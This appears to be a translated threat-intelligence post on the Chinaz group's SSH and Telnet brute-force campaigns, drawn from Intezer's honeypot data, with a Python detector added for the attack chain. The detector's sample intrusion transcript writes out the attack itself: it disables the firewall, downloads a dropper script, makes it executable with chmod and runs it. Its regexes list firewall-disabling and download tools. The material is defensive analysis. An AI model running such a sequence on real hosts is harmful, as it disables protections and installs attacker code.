A note on the name first: this Chinaz is not Chinaz.com, the "webmaster's home". Given my respect for the domestic scene, I can say with confidence that this is a well-known criminal gang, one that likes to use old vulnerabilities and password brute-forcing to spread XorDDoS and BillGates.
Related links:
http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html
http://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html
The following is a series of brute-force attacks captured by Intezer's honeypot. After getting in through SSH/Telnet brute forcing, the attacker first shuts down the firewall, then downloads the payload, sets its permissions, and finally runs the payload.
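The four-step sequence above (firewall off, fetch, chmod, run) is distinctive enough to flag in honeypot or shell-audit transcripts. The detector below is an added example written for this post, not code from the page or from Intezer; the two session transcripts are constructed, and 203.0.113.10 is a documentation address standing in for an HFS panel.

```python
import re
from typing import Dict, List, Tuple

# Constructed session transcripts (placeholders, not captures from the page);
# 203.0.113.10 is a documentation address standing in for an HFS panel.
INTRUSION_SESSION = """\
cd /tmp
service iptables stop
wget http://203.0.113.10:8080/dropper.sh
chmod 777 dropper.sh
sh dropper.sh
"""
ADMIN_SESSION = """\
cd /opt/app
wget http://203.0.113.10:8080/release-notes.txt
less release-notes.txt
"""

# The chain in the order the post describes it.
CHAIN = ["firewall_off", "download", "chmod", "execute"]

# One pattern per stage, each applied to a single command line.
STAGES: Dict[str, re.Pattern] = {
    "firewall_off": re.compile(
        r"\b(?:service\s+iptables\s+stop|systemctl\s+stop\s+firewalld|iptables\s+-F|ufw\s+disable)\b"),
    "download": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),
    "chmod": re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b"),
    "execute": re.compile(r"^\s*(?:\./\S+|(?:sh|bash|nohup)\s+\S+)"),
}

def classify(line: str) -> List[str]:
    """Names of the chain stages that a single command line matches."""
    return [name for name, pat in STAGES.items() if pat.search(line)]

def detect_chain(session: str) -> Tuple[List[Tuple[str, int]], bool]:
    """Return the first line number of each stage seen, ordered by line, plus
    whether all four stages appeared in chain order (a download alone is not
    enough; an admin fetching a file must not trip the rule)."""
    first_seen: Dict[str, int] = {}
    for lineno, line in enumerate(session.splitlines(), start=1):
        for stage in classify(line):
            first_seen.setdefault(stage, lineno)
    hits = sorted(first_seen.items(), key=lambda kv: kv[1])
    full_chain = all(s in first_seen for s in CHAIN) and [s for s, _ in hits] == CHAIN
    return hits, full_chain

if __name__ == "__main__":
    for name, sess in (("intrusion", INTRUSION_SESSION), ("admin", ADMIN_SESSION)):
        hits, full = detect_chain(sess)
        print(name, hits, "FULL CHAIN" if full else "partial/none")
```

Feed it one session per string (one line per command) from a honeypot or auditd export; only sessions that show every stage in the described order are reported as the full chain.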
The downloaded script sits in the HFS panel shown below.
The Linux sample in the panel above is a BillGates variant.
The PE sample is a Gh0st variant, and the C2 is the same.
By looking up the domain's resolution history and the passive DNS for its IP, you can find traces of other websites this group has passed through, such as:
A day later, a new sample from the DDoSClient family was uploaded to the panel.
Inside the rar is the wolf.
Other HFS panels can be found through the passive DNS resolutions of the IP just discovered, via VirusTotal.
Port scan tool
Chinaz's HFS servers can also be found through Shodan. The rules can be referred to
In the original post, Intezer also treated the Nitol remote-access trojan as an organization in its own right, then drew strong correlations between MrBlack, Chinaz and Nitol, which in turn pulled in our big Iron Tiger group. If you are interested, see the code comparison at the end of the original post.
Original wording:
Chinaz is hosting instances of the Linux and Windows versions of MrBlack, which have shown a code-reuse connection to an older version of ServStart. In addition, we found that a newer version of ServStart is hosted alongside the MrBlack Linux instance. Therefore, there may be a relationship between the MrBlack and ServStart actors, indicating a potential relationship between Chinaz and the Nitol family.
In addition, Chinaz Windows components have been found to be infected with Nitol components, indicating that these actors may have been operating on servers that were already infected with Nitol. This reinforces the assumption that there may be a deeper relationship between the two threat groups. Chinaz has always been a relatively active group of threat actors. Even though its overall infrastructure has changed a great deal since the early stage, its complexity is developing slowly. To reflect the most relevant relationships discussed in this blog, we decided to present them using the following chart:
Original link:
https://www.intezer.com/blog-chinaz-relations/
IOCs